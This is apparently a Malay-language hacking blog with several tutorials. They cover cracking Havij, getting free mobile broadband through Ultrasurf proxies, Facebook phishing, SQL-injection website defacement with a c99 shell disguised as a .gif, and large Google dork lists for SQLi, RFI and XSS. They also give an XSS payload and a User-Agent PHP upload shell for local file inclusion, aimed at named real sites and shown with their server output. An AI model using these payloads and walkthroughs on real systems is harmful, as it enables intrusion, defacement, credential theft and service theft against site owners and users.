• WELCOME TO WWW.KHERY.NET

    Download Free All Software And Tricks-Tips This Site is specially for sharing Information of various Softwares and Latest Tricks and Tips just for you.. Do not forget to share existing knowledge in my blog to people you know .. TQ

Showing posts with label Hacking. Show all posts


DOWNLOAD HERE

Download Havij from the below links of 4shared. Extract Havi1-17pro.zip. Double click on Havij 1.17 pro setup file. When you finish the setup process close the program. Look for the Havij folder in C partition. Copy The "Loader"  from "Havi1-17pro" folder and paste it in Havij folder in C partition. Right click on "Loader.exe" in Havij folder in C partition and choose Create desktop Shortcut. If you are using windows vista/7/8 run the loader that you created shortcut for it as administrator. When the Havij is loaded press register.. 

password : khery.net


Assalamualaikum & Salam 1 Malaysia.. Hari ini aku nak ajar korang semua cara-cara nak menggunakan celcom broadband secara free, bermaksud walaupun credit celcom BB prepaid kita dah habis...ataupun jika anda mempunyai USB Broadband,guna je celcom simkad yg korang guna hp sekarang....


 1. Mula-mula download ultrasurf 9.5 kat bawah sini..


Donwload ultrasurf di sini 

   
2.  Dah siap "Download" terus "Open"

3.  Dah "Open" pilih "Option", untick ''Start Ie Automatically At Start''

4.  Pastu tengok bawah, click "Proxy Setting", then tick "Direct Used Ultra Surf"
  kemudian exit..

5.  Dalam "Browser"yang korang guna tu, pergi kat "Setting - Connection", set 
  "Manual Proxy" address : "127.0.0.1" port "9666"

6.  Sekarang "Connect 3G"modem.. Ataupun jika anda mempunyai "USB Broadband   Maxis", atau mane2 Broadband, masukkan je Sim Card Celcom korang..  Ade rezeki  dapat lah..

7. Dah "Connect"terus "Run ultrasurf 9.5", tunggu sampai dia tulis "Successfully
  Connected To Server"

  •    Jika anda tak dapat connect guna ultrasurf tu. Sila Guna langkah ke-2  ini.

1. Dalam "Ultrasurf" - "Option" - "Proxy Setting" - "Manual Proxy Setting"
  "Proxy Host" address : "10.128.1.242Port "8080".. Close Ultasurf lepas tu open 
  balik..

  • Kalau tak boleh jugak 

1. Bukak UltraSulrf balik - "Proxy Setting" - tick "Direct Use Ultrasurf"

  Sekarang dah boleh bukak browser yang telah di set manual proxy tadi, confirm boleh surf,
  youtube dan download walaupun credit prepaid celcom bb dah habis..

Perhatian!! 

  Jangan try benda ni masa kredit simcard masih ada @ banyak sebab aku tak jamin dia tak
  tolak kredit, tapi kalau kredit simcard dah abis, tak dak masalah, Sekian terima kasih..

 cc : juzt2u


Adakah anda ingin "hack password facebook " dengan baik maka posting ini hanya untuk anda,  di sini adalah beberapa cara untuk hack password facebook:
  • Facebook phishing
  • Keylogging
  • Ciri-ciri Facebook
  • Virus
Tapi hari ini kita akan fokus pada kaedah yang memiliki tingkat keberhasilan yang tinggi bersel Phishing dan keylogging, 

Apa itu phishing?

Phishing merupakan kaedah yang paling umum digunakan untuk hack FACEBOOK. Teknik yang paling banyak digunakan di phishing adalah penggunaan Fake Laman Masuk, juga dikenali sebagai laman palsu. Halaman login palsu ini serupa dengan halaman login asli likeYahoo laman web, Gmail, MySpace dll MANGSA tertipu untuk percaya laman facebook palsu untuk menjadi nyata dan masukkan passwordnya. Tapi begitu pengguna cuba untuk login melalui laman-laman, nya / facebook nya butiran akaun anda yang dicuri jauh. Namun phishing memerlukan pengetahuan khusus dan kemahiran peringkat tinggi untuk melaksanakan. Jadi saya mengesyorkan penggunaan Phishing untuk hack akaun facebook kerana ia merupakan satu termudah.



[Video] Facebook Phishing Full Tutorial 


Download kat bawah ni file "index.html" dan "login.php"






Assalamualaikum,pada kali ini aq akan ajar cara bagaimana hendak men-deface sesebuah laman web dengan menggunakan cara SQL Injection untuk mendapatkan admin password..baiklah,saya akan tunjukkan satu persatu caranya...

Sebelum itu,kamu harus ada ilmu mengenai defaced,IP ADDRESS dan SQL Injection (PENTING!!):-

APAKAH ITU DEFACED:

Defaced ialah perbuatan merubah paparan utama sesebuah website.Paparan utama dipanggil shell.Shell ialah satu kode atau aturcara yang sudah diprogramkan dalam bentuk laman web untuk ditunjukkan kepada sesiapa yang melayari web tersebut.Defaced ialah satu kerja jahat :D menggantikan kode asal kepada kode yang diinginkan oleh penggodam.Selepas kode itu digantikan,sesiapa sahaja yang melayari laman web itu akan melihat paparan yang diubah oleh penggodam.Untuk melakukan perkara ini,kamu harus mencipta satu shell dalam extension (".htm" atau ".html") ataupun anda boleh copy shell ini daripada laman web yang telah didefaced dan hanya menukar sedikit sahaja kandungan dalam shell itu.

APAKAH ITU SQL INJECTION:-

SQL Injection ialah satu cara untuk kita memecah masuk pangkalan data (database) sesebuah website bertujuan mencuri data dan nama pengguna dan juga password.SQL Injection ialah kaedah memecah masuk yang paling berkesan sekali berbanding XXS Cross dan PHP Injection.Asalnya,SQL Injection harus dilakukan dengan cara manual iaitu memasukkan kode kedalam URL ataupun dipanggil UNION.Kode ini sangat susah dan ramai penggodam baru (newbies) tidak dapat menghafal kode ini secara menyeluruh.Tetapi,banyak tool yang telah direka bagi memudahkan penggodam memecah masuk pangkalan data.Antara alatan yang popular untuk melakukan SQL Injection ialah Havij dan SQLi Helper.

APAKAH ITU IP ADDRESS:-

IP Address ialah pengenalan kepada komputer yang menggunakan Internet.IP address terdapat maklumat mengenai lokasi di mana sesebuah komputer bersambung kepada Internet.Ia sama seperti kad pengenalan,begitulah juga IP Address.

TOOL YANG HARUS KAMU ADA:-

(1).Havij 1.15 atau versi lain..

KEGUNAAN : Untuk melakukan SQL Injection ke sesebuah website

Download Havij 1.15

(2).Platinum Hide IP 3.0.9.6 atau versi lain..

Download Platinum Hide IP 3.0.9.6
KEGUNAAN :

Untuk menyembunyikan IP kamu semasa kamu melakukan SQL Injection atau melogin sebagai ADMIN..

(3).C99.PHP

KEGUNAAN :

Digunakan untuk merubah kode shell yang terdapat di dalam sesuatu website..

DOWNLOAD LINK : c99.php
Website yg menawarkan macam2 shell : http://tools.th3-0utl4ws.com/shells/index.html

Baiklah,itulah tool yang mesti kamu ada.Kedua-dua tool ini penting terutama Platinum Hide IP kerana tool itu berfungsi menyembunyikan IP kamu.Kalau kamu tidak mempunya tool itu,kamu akan ditangkap kerana admin server itu mengesan kamu dengan mudah kerana kamu tidak menyembunyikan IP kamu..

Sekarang kita mesti mencari laman web yang security lemah atau lebih dipanggil website yang vulneberity(dalam bahasa Inggeris) untuk dilakukan defacement.Terdapat langkah yang mudah untuk mencari website yang vuln(singkatan vulneberity).Iaitu menggunakan "google dork","google dork" ialah salah satu kemudahan diberi google untuk mencari website yang penting.Tetapi,kita boleh menyalahgunakan kelebihan itu untuk mencari website yang vuln.Caranya seperti begini:-

(1).Buka "www.google.com"

(2).Taip salah satu kode di bawah ini

inurl:"id=" & intext:"Warning: mysql_fetch_assoc()
inurl:"id=" & intext:"Warning: mysql_fetch_array()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: is_writable()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: Unknown()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: pg_exec()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: mysql_query()
inurl:"id=" & intext:"Warning: array_merge()
inurl:"id=" & intext:"Warning: preg_match()
inurl:"id=" & intext:"Warning: ilesize()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: require()

(3).Tekan search

(4).Akan keluar beratus-ratus website yang vuln.

(5).Pilih salah satu.

Cuba buka laman yang anda pilih itu,anda pasti lihat error yang berlaku seperti "Warning: mysql_fetch_assoc()" atau "Warning: mysql_fetch_array()".Itu maknanya security website ini masih lemah dan berupaya untuk didefacedkan.Contohnya saya mendapat web seperti ini:-

http://www.ypages.in/sell_offers.php?cid=28

Untuk kita mengdefaced laman web tersebut.Kita harus menyamar sebagai admin dan sebagai admin,tidak akan ada sekatan lagi untuk kita lakukan apa sahaja di website itu.Dan untuk mencari kata pengguna admin dan juga password,kita harus memecah masuk kedalam pangkalan data website berkenaan.Sebenarnya error yang kita cari sebentar tadi ialah pintu masuk kedua ataupun dipanggil "backdoor" dalam sesebuah website.Error tersebut akan memudahkan kita melakukan SQL Injection berbanding melakukan di page yang tidak mempunyai error.Antara alatan kesukaan saya untuk memecah masuk database ialah Havij,Havij sangat terkenal di kalangan penggodam kerana ia memudahkan kerja penggodam bagi melakukan SQL Injection.

SEBELUM ANDA MEMULAKAN SQL INJECTION KE SESUATU WEBSITE.PASTIKAN ANDA SUDAH MENYEMBUNYIKAN IP ANDA KERANA APABILA ANDA MELAKUKAN SQL INJECTION,WEBSITE SERVER BOLEH MENGESAN IP ADDRESS ANDA.SAYA TIDAK AKAN BERTANGGUNGJAWAB SEKIRANYA ANDA DITANGKAP KERANA KECUAIAN ANDA !

Caranya melakukan SQL Injection adalah seperti berikut:-

(1).Buka Havij

(2).Masukkan alamat website yang error sebentar lagi.

Contoh : http://www.ypages.in/sell_offers.php?cid=28

(3).Tekan analyze.

(4).Tunggu kerana Havij sedang melakukan SQL Injection ke dalam website berkenaan.

Bila anda berjaya,Tables akan diunlockkan,di situ,anda boleh mencuri admin username dan password.TETAPI,jika anda tidak berjaya,cari target lain kerana website itu mungkin sudah diupgradekan pangkalan datanya dan sukar untuk kita memecah masuk pangkalan datanya.Dan apabila berjaya,pergi ke "Tables",di situ keluar fail yang mana fail itu ialah "DataBase".Katakanlah fail itu bernama "ID_INFORMATION",maka click pada kotak itu.Selepas itu tekan "Get Tables",ia akan mencari table yang wujud dalam database itu,selepas semua table sudah habis discan oleh Havij,cari nama tables yang merujuk nama username atau admin.Kerana kebiasaan di dalam table itulah kata nama dan kata laluan Admin disimpan.Jika anda melihat table yang aneh seperti "admin" atau "username_info"..click pada kotak itu,selepas itu,tekan "Get Colums"..ia akan muncul fail-fail yang mungkin menyimpan data bagi admin username dan password..andainya terdapat dua colum iaitu "username" dan "password"..click pada kedua-dua fail tersebut..click "Get Data"..ia akan keluar username dan password...itulah username dengan password admin..tetapi,andai jika anda scan,terdapat banyak username dengan password yang keluar,pilih username yang tertulis admin..itulah username dan password admin yang sebenar..Tetapi,andai kata nama admin muncul,tetapi passwordnya dalam bentuk yang pelik.Iaitu password yang mempunyai 32 huruf.Itu adakah password hash.Ia telah dihashkan bagi menyukarkan penggodam mendapat password yang benar-benar betul.Contohnya passwordnya dalam bentuk begini :-

Contoh Password:-

 098F6BCD4621D373CADE4E832627B4F6

Ini dipanggil MD5 hash.MD5 hash sangat terkenal sekali kerana banyak digunakan oleh web server bagi menyembunyikan password mereka walaupun database mereke dipecah masuk oleh penggodam.
Password itu telah dihashkan begini:-

Contoh:-

test (password sebenar) ---------> 098F6BCD4621D373CADE4E832627B4F6 (telah dihashkan)

Tetapi,tidak mengapa.Di dalam Havij,terdapat tool yang membolehkan kita memecah password hash itu.Begini caranya:-

(1).Buka "Havij"

(2).Pergi ke "MD5"

(3).Masukkan hash "MD5"tadi.

(4).Tekan "Start"

(5).Lihat passwordnya.

Tetapi,jika kamu tidak berjaya ataupun failed dalam memecahkan password itu.Mungkin terdapat beberapa sebab.Mungkin MD5 itu telah dihashkan dalam bentuk AES-256.AES-256 ialah bentuk penyimpan password security yang paling selamat dan sukar dihash.Ia hanya boleh dihash menggunakan tool "Cain and Abel".Kedua,mungkin password asal yang belum dihash itu terdapat dalam digit yang panjang,seperti contoh yang saya tunjuk tadi iaitu "test".Ia hanya 4 digit,password yang senang untuk dicrack ialah 8 digit sahaja.Itu pun bergantung kepada security MD5 itu.Jika password asal digitnya lebih daripada 9.Ia sukar dihash dan hanya boleh dihash dengan menggunakan Rainbow Table.Rainbow table ialah satu "table" yang digunakan oleh "Cain and Abel" untuk menggunakan kaedah cryptology untuk memecah kod tersebut.Rainbow Table boleh didownload tetapi saiznya di luar jangkaan kita,iaitu 50-300 GB.Kita juga boleh menghasilkan sendiri Rainbow Table tetapi ia mengambil masa sehingga 10 tahun untuk siap.Ketiga,mungkin hash tersebut bukan MD5,mungkin MD2 atau MD4.Terdapat banyak hash yang ada sekarang.Kalau kamu mempunyai masalah password dalam bentuk MD5 hash.Saya sarankan kamu mengambil target lain kerana kita akan membuang masa sahaja untuk memecah password itu melainkan itu website yang sudah kamu target sejak dahulu sekali.Saya tidak akan menghalang kamu.Sekarang kita kembali ke agenda kita,iaitu mendefacedkan website.

Sekarang tugas sebenar ialah mendefaced laman web berkenaan.Perkara pertama ialah kamu harus memecah masuk ke dalam admin website itu dengan menggunakan username dan password yang kamu dapat semasa melakukan SQL Injection.Kebiasaan,untuk melogin kedalam website,anda harus menambah "/admin" kebelakang nama website tersebut.Contohnya:-

www.example.com/admin

Tetapi,jika page itu tidak wujud.Maka admin login page mungkin telah disembunyikan dengan nama yang lain selain admin.Andai berlaku kejadian itu,Havij ialah alat yang sempurna sekali untuk mengesan admin login page yang terdapat dalam laman web berkenaan.Caranya begini:-

(1).Pergi ke "Find Admin"

(2).Masukkan laman web berkenaan (Contohnya:www.example.com)

(3).Tekan start.Ia akan mula mencari admin login page dalam laman web berkenaan

(4).Bila sudah habis scan,buka URL berkenaan.

Masukkan username dengan password.Bila berjaya masuk,anda berupaya melihat segala fail sulit atau e-mail sulit yang terdapat dalam website berkenaan.Tetapi,tujuan kita ialah mendefaced,jadi kita beralih kepada agenda kita.Untuk mendefaced,seperti saya sebutkan sebentar tadi,kita gunakan shell "c99.php" sebagai shell utama kita hendak mendefaced web berkenaan.Cari apa-apa yang ditulis dalam website berkenaan upload.Jika terdapat butang yang membolehkan kita mengupload shell,ia akan memudahkan kerja kita.Tetapi,jika tak terdapat butang yang membenarkan kita mengupload shell.Kita harus "menipu" laman web berkenaan.Cari lagi butang yang membolehkan kita menguploadkan fail,selalunya admin hanya dibenarkan mengupload gambar sahaja.Tetapi,tidak mengapa.Rename kembali shell "c99.php" anda kepada "c99.php.gif".Ini akan menipu laman web berkenaan kerana laman web berkenaan akan menganggap kita cuma mengupload gambar sahaja tetapi kita sudah mengupload shell ke website berkenaan.Buka shell berkenaan,contohnya:-

www.example.com/c99.php.gif (mengikut kepada apa extension yang anda tukar)

Bila anda buka c99.php,ia akan keluar satu page yang membolehkan kita mengawal web itu lebih daripada admin tersebut.Ia membolehkan kita mengedit,menukar dan memadam shell yang terdapat dalam website berkenaan.Tujuan kita adalah mengdefaced website berkenaan.Oleh itu,kita akan mengedit shell yang terdapat dalam website itu.Cari apa-apa shell yang mungkin bernama "index.php" atau "main.php".Cari apa-apa sahaja shell yang mungkin paparan utama website berkenaan.Contohnya,"index.php" ialah paparan utama yang keluar apabila kita membuka website berkenaan.Jadi,shell itulah yang kita akan edit.Tekan pada "index.php" berkenaan.Akan keluar kode yang terdapat dalam shell itu,padam semua kode itu,gantikannya dengan kode shell kita.Tekan save.Sekarang.Anda telah berjaya.Cuba taip website itu untuk melihat ia berjaya atau tidak.Kalau ia berjaya,ia akan keluar paparan yang kita sudah programkan ke dalam website itu.

Itu saja untuk tuto kali ini....Semoga anda berjaya melakukannya.. :D

Credit to : We Are Programmers From Malaysia, Mohd Shahril, Noobster HexorCrew (H3X.CON) & Squad Elite. Afif Zahri / Reaperz the Hacking




Google sebagai search engine ternama di dunia cyber merupakan alat yang memudahkan/membantu user untuk mengais informasi - informasi di dunia maya melebihi yellow pages semua data yang dibutuhkan ditampilkan secara akurat mengenai topik atau details yang dicari user jangan heran jika ditanya seseorang jawabannya adalah "Tanya aja paman Google" saking informatif google tersebut Senjata yang paling sering di gunakan dalam mengeksploitasi pun yang paling sering adalah Google

Google dork adalah kata kunci dalam mempermudah pencarian data, kata kunci inilah yang membantu user dalam mencari data yang akurat maupun data data yang tersembunyi seperti log, username maupun password.

SQLI

inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:".php?id=1"
inurl:".php?cat=1"
inurl:".php?catid=1"
inurl:".php?num=1"
inurl:".php?bid=1"
inurl:".php?pid=1"
inurl:".php?nid=1"

RFI 

inurl:/_functions.php?prefix=

inurl:/cpcommerce/_functions.php?prefix=

inurl:/modules/coppermine/themes/default/theme.php?THEME_DIR=

inurl:/modules/agendax/addevent.inc.php?agendax_path=

inurl:/ashnews.php?pathtoashnews=

inurl:/eblog/blog.inc.php?xoopsConfig[xoops_url]=

inurl:/pm/lib.inc.php?pm_path=

inurl:/b2-tools/gm-2-b2.php?b2inc=

inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=

inurl:/modules/agendax/addevent.inc.php?agendax_path=

inurl:/includes/include_once.php?include_file=

inurl:/e107/e107_handlers/secure_img_render.php?p=

inurl:/shoutbox/expanded.php?conf=

inurl:/main.php?x=

inurl:/myPHPCalendar/admin.php?cal_dir=

inurl:/index.php/main.php?x=

inurl:/index.php?include=

inurl:/index.php?x=

inurl:/index.php?open=

inurl:/index.php?visualizar=

inurl:/template.php?pagina=

inurl:/index.php?pagina=

inurl:/index.php?inc=

inurl:/includes/include_onde.php?include_file=

inurl:/index.php?page=

inurl:/index.php?pg=

inurl:/index.php?show=

inurl:/index.php?cat=

inurl:/index.php?file=

inurl:/db.php?path_local=

inurl:/index.php?site=

inurl:/htmltonuke.php?filnavn=

inurl:/livehelp/inc/pipe.php?HCL_path=

inurl:/hcl/inc/pipe.php?HCL_path=

inurl:/inc/pipe.php?HCL_path=

inurl:/support/faq/inc/pipe.php?HCL_path=

inurl:/help/faq/inc/pipe.php?HCL_path=

inurl:/helpcenter/inc/pipe.php?HCL_path=

inurl:/live-support/inc/pipe.php?HCL_path=

inurl:/gnu3/index.php?doc=

inurl:/gnu/index.php?doc=

inurl:/phpgwapi/setup/tables_update.inc.php?appdir=

inurl:/forum/install.php?phpbb_root_dir=

inurl:/includes/calendar.php?phpc_root_path=

inurl:/includes/setup.php?phpc_root_path=

inurl:/inc/authform.inc.php?path_pre=

inurl:/include/authform.inc.php?path_pre=

inurl:index.php?nic=

inurl:index.php?sec=

inurl:index.php?content=

inurl:index.php?link=

inurl:index.php?filename=

inurl:index.php?dir=

inurl:index.php?document=

inurl:index.php?view=

inurl:*.php?sel=

inurl:*.php?session=&content=

inurl:*.php?locate=

inurl:*.php?place=

inurl:*.php?layout=

inurl:*.php?go=

inurl:*.php?catch=

inurl:*.php?mode=

inurl:*.php?name=

inurl:*.php?loc=

inurl:*.php?f=

inurl:*.php?inf=

inurl:*.php?pg=

inurl:*.php?load=

inurl:*.php?naam=

allinurl:/index.php?page= site:*.ru

allinurl:/index.php?file= site:*.ru

XSS 

!xss inurl:com_feedpostold/feedpost.php?url=

!xss inurl:/products/orkutclone/scrapbook.php?id=

!xss inurl:/products/classified/headersearch.php?sid=

!xss inurl:/poll/default.asp?catid=

!xss inurl:/search_results.php?search=Search&k=

!xss /preaspjobboard//Employee/emp_login.asp?msg1=

!xss pages/match_report.php?mid= pages/match_report.php?mid=

!xss /notice.php?msg= /notice.php?msg=

!xss /gen_confirm.php?errmsg= /gen_confirm.php?errmsg=

!xss /index.php?option=com_easygb&Itemid= 

!xss /2wayvideochat/index.php?r=

!xss /view.php?PID= /view.php?PID=

!xss /Property-Cpanel.html?pid= /Property-Cpanel.html?pid=

!xss /showproperty.php?id= /showproperty.php?id=

!xss /vehicle/buy_do_search/?order_direction=

!xss /elms/subscribe.php?course_id= /elms/subscribe.php?course_id=

!xss /winners.php?year=2008&type= /winners.php?year=2008&type=

!xss /schoolmv2/html/studentmain.php?session=

!xss /site_search.php?sfunction= /site_search.php?sfunction=

!xss /search.php?search_keywords= /search.php?search_keywords=

!xss /hexjector.php?site= /hexjector.php?site=

!xss /news.php?id= /news.php?id=

!xss /index.php?view=help&faq=1&ref=

!xss inurl:"contentPage.php?id="

!xss inurl:"displayResource.php?id="

!xss intext:"Website by Mile High Creative"

!xss index.php?option=com_reservations&task=askope&nidser=2&namser= "com_reservations"

!xss /info.asp?page=fullstory&key=1&news_type=news&onvan=





Okey Tpi aq dah ajar SqlScan kn... :) okey Class yg kedua aku akan ajar ko orng XSS Vulnerability.. thu tahu XSS Vulnerability..?? 
XSS Vulnerability adalah suatu cara memasukan code/script HTML kedalam suatu website dan dijalankan melalui browser di client.. (Y)
okey kite mula kn class ye...

step1 : masuk kn dork ni kedalam google..

Dork : inurl:"/showcatrows.php?CategoryID="

step2 : lepas ko orng dah masuk kn dork kat dlm google pilih je site yg korng nk.. contoh mcm aq aq pilih site ni..http://www.examsolutions.net/maths-revision-papers/showcatrows.php?CategoryID=13

step3: lepas ko orng dapat site tu.. ko orng masuk kn scritpt HTML kat belakang URL web itu..
Script HTML : ><marquee><h1> Hacked by Khery code
newbie </h1></marquee>


contoh : http://www.examsolutions.net/maths-revision-papers/showcatrows.php?CategoryID=13%3E%3Cmarquee%3E%3Ch1%3E+Hacked+by+khery+codenewbie+%3C%2Fh1%3E%3C%2Fmarquee%3E

klau ko orng pndai cari mungkin korng boleh depes satu site die.. ;)
HASIL <-- clik
tpi yang ni x abis depes ar.. wkwkwkkw :v

sekian sja dari aq utuk semua semoga ko orng semua paham ape yg aku ajar.. x pahan tanye insya'allah klau aq free aq reply.. ;)
okey ar smpai kat sni je.. assalammualaikum..

thnks to : all mmber Code Newbie and Single Attacker Crew

Hari ni aq bg tools die nme die Sql Poison v1.0 - The Exploit Scanner ..
so aq harap tools ni boleh menolong korng orng.. ;)
ini ni step2 cara nk guna kannya :)

step 1: ko orng bukak sqlscan..

step 2: click all dork ni pilih dork yg mne korng nk...

step 3: contoh ko orng dah pilih dork yg korng nk mcm aq aq pilih index.php?=

step4: ko orng pilih country itu mcm ko orng pilih site negara ar.. kalu x nk ko orng tekan all je.. (" ..jangn ko orng pilih site MY n ID pulak ingt tu negara ko orng berpijak di bumi yg nyata okey .. :P ")

step5: sepas ko orng pilih country ko orng click scan .. n tunggu die abis scan..

step6: lepas abis scan ko orng pilih site n double click kat site yg korng pilih tu.. pilih send to sqli crawl..

step7: ko orng click crawl n tunggu die abis sqlscan

step8: setelah abis scan kanat bawah die akan ade site yg color merah tu lah site yg vuln.. ;)

pass : khery

thnks to : all mmber Code Newbie and Single Attacker Crew




Assalamualikum , arini Aku nak ajar korang Local File Inclusion [ LFI ].

Barang yg diperlukan :-

* Google Chrome* User Agent For Chrome


User Agent For Chrome boleh didapati di sini.

https://chrome.google.com/webstore/detail/user-agent-switcher-for-c/djflhoibgkdhkhhcedjiklpkjnoahfmg

Korang install dulu User Agent. Lepas korang install , akan keluar satu bende dekat atas belah kanan .

Korang click tu lepas tu click Settings

Korang isi kan kotak-2 tu. Ikut ape yang aku tulis dekat bawah .

New User-agent name >> LFI

New User-Agent String >> <?php @copy($_FILES['file']['tmp_name'],$_FILES['file']['name']); ?><p>Code-Newbie</p><br>
<form action="" method="post" enctype="multipart/form-data">Filename: <input type="file" name="file" /><input type="submit" value="Submit" />


Group >> LFI

Append? >> Replace

Indicator Flag >> LFI

Okay lepastu tekan Add.

Ok , sekarang ni , kita tinggal cari website ,

Dork :- allinurl:?index.php?pagina=contato.php site:br

allinurl:?index.php?page=contact.php

allinurl:?index.php?pagina=noticias.php site:br


http://pastebin.com/rKWHFHVT

Dork korang boleh ubah ye .

ok , korang pilih salah satu website , contoh http://www.open-isb.com.br/index.php?pagina=noticias.php

korang ubah lepas "=" , ubah noticias.php tu jadi %2Fproc%2Fself%2Fenviron , so dia akan jadi

http://www.open-isb.com.br/index.php?pagina=%2Fproc%2Fself%2Fenviron

Kalau site tu vuln , dia akn keluar :-

DOCUMENT_ROOT=/home/open-isb/public_htmlGATEWAY_INTERFACE=CGI/1.1HTTP_ACCEPT=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8HTTP_ACCEPT_CHARSET=ISO-8859-1,utf-8;q=0.7,*;q=0.3HTTP_ACCEPT_ENCODING=gzip, deflateHTTP_ACCEPT_LANGUAGE=en-US,en;q=0.8HTTP_COOKIE=__utma=94620866.542769388.1366547884.1366547884.1366547884.1; __utmz=94620866.1366547884.1.1.utmccn=(referral)|utmcsr=facebook.com|utmcct=/l.php|utmcmd=referralHTTP_HOST=www.open-isb.com.brHTTP_USER_AGENT=Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.64 Safari/537.31HTTP_X_FORWARDED_FOR=203.106.157.12HTTP_X_VARNISH=1706120852LOG_SUBDIR=open-isbPATH=/bin:/usr/binPHPRC=/home/open-isbQS_AllConn=95QS_ConnectionId=13675908865048115804886QS_SrvConn=95QUERY_STRING=pagina=%2Fproc%2Fself%2FenvironREDIRECT_STATUS=200REMOTE_ADDR=203.106.157.12REMOTE_PORT=35382REQUEST_METHOD=GETREQUEST_URI=/index.php?pagina=%2Fproc%2Fself%2FenvironSCRIPT_FILENAME=/home/open-isb/public_html/index.phpSCRIPT_NAME=/index.phpSERVER_ADDR=187.45.193.219SERVER_ADMIN=webmaster@open-isb.com.brSERVER_NAME=www.open-isb.com.brSERVER_PORT=80SERVER_PROTOCOL=HTTP/1.1SERVER_SIGNATURE=SERVER_SOFTWARE=ApacheSUPHP_URI=/index.phpUNIQUE_ID=UYPH5rstwdsAABMWaCsAAACe

kalau korang nmpak tu , korang tekan


and pilih LFI ,

lepas klik LFI , korang click lagi LFI ,

Ok , nanti site tu akan allowed korang untuk upload shell :)

Buka SHELL : http://www.open-isb.com.br/shell.php

Good Luck :)

havij 1.15 

ini havij yang full .. bukan jenis yang trial ..

ni link untuk download dia ...

sebelum guna kena crack dulu .. belum full lagi .. bawa bersabar ye .. ok .. first sekali buka havij 1.15 tu tadi .. dekat gambar tu .. klik register




lepas tu akan keluar name dan file . untuk name korang masukan crack name ni : Cracked@By.Exidous


lepas tu .. ruangan file pula ...

korang tekan sebelah kotak kosong tu tadi ...

lepas tu masukan file ini : ' HavijKey.lic ' .. ada didalam folder havij 1.15 itu tadi ..

fail: HavijKey.lic

lepas tu tekan register .. 


Salam sejahtera semua .. hari ini saya nak ajr korang cara mengunakan havij k..

